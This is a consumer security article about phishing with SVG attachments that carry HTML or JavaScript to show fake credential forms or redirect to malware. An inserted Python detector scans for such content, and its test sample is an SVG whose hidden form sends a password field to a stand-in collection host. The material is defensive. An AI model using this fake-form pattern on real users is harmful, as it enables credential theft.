Before talking about scams, a quick refresher course on SVG, or Scalable Vector Graphics, files is in order. Unlike classic images like JPG or PNG, which look like a mosaic of pixels, SVGs work differently. They use lines, shapes, and text described by mathematical formulas in their code.
Images like no other
The result? A sharp, precise image that can be enlarged or reduced infinitely without losing quality. This is what makes SVGs very popular for logos or online graphics. But this technical flexibility has also attracted the attention of hackers.
Hackers have discovered a great passion for SVG files in their phishing campaigns, according to security researchers at MalwareHunterTeam. Their goal is simple: to bypass security tools that scan attachments for threats. To those tools, an SVG file looks more like a harmless piece of text than a real image, which makes it difficult to identify as malicious.
How does it work? Some SVGs embed HTML or JavaScript code, in addition to graphical instructions. This allows hackers to turn these files into interactive tools that can display fraudulent forms or automatically redirect your browser to malicious sites.
Let’s take a concrete example. You receive an email with an SVG file attached, presented as an important document. Once opened, a fake Excel table appears on the screen, asking you to enter your credentials. What you don’t see is that this information is immediately transmitted to hackers. In other cases, the file may contain a link that downloads malware to your device.
And the worst part is that security software struggles to spot these attacks. According to samples shared by MalwareHunterTeam, some malicious SVG files go completely unnoticed or are detected by only one or two out of dozens of antivirus solutions.
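Because the HTML and JavaScript described above must appear in the file's markup, a mail filter can look for them directly. The following Python check is an added example, not code from the original article or from MalwareHunterTeam; the function names, finding labels and sample files are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Elements that let an SVG carry script or embedded HTML (forms, frames, meta refresh).
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object",
                   "form", "input", "meta"}
LINK_ATTRS = {"href", "src", "action"}
SCRIPT_SCHEMES = ("javascript:", "data:text/html")

def local(name):
    """Drop the '{namespace}' prefix ElementTree adds and lowercase the name."""
    return name.rsplit("}", 1)[-1].lower()

def scan_svg(data: bytes):
    """Return a sorted list of active-content findings for one SVG attachment."""
    # Refuse entity declarations before parsing (entity-expansion DoS). Assumes
    # UTF-8 input; a production gateway would use a hardened XML parser.
    if b"<!ENTITY" in data:
        return ["entity-declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["unparseable-xml"]
    findings = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.add("element:" + tag)
        for attr, value in el.attrib.items():
            name = local(attr)
            url = "".join(value.split()).lower()  # ignore whitespace and case
            if name.startswith("on"):             # onload, onclick, ...
                findings.add("handler:" + name)
            elif name in LINK_ATTRS and url.startswith(SCRIPT_SCHEMES):
                findings.add("script-url:" + name)
    return sorted(findings)

# Constructed samples (not taken from real campaigns); the script body is inert.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'
FAKE_FORM = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="noop()">
  <foreignObject width="400" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://collector.example/">
      <input name="password" type="password"/>
    </form>
  </foreignObject>
  <script>function noop(){}</script>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("fake form", FAKE_FORM)):
        print(label, "->", scan_svg(sample) or "no active content")
```

A plain logo or chart has no reason to contain any of these findings, so a gateway can quarantine or strip attachments that produce them.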
SVG files in an email? Absolute distrust! Unless you're a developer and are expecting exactly this type of attachment, it's best to avoid them like the plague. Caution remains in order: immediately delete any suspicious message containing an SVG file. While the attackers' ingenuity almost deserves applause, let's not forget that these attacks aim above all to steal your data or infect your devices. So, the next time a pretty picture seems too good to be true, think twice before clicking…
Source: www.journaldugeek.com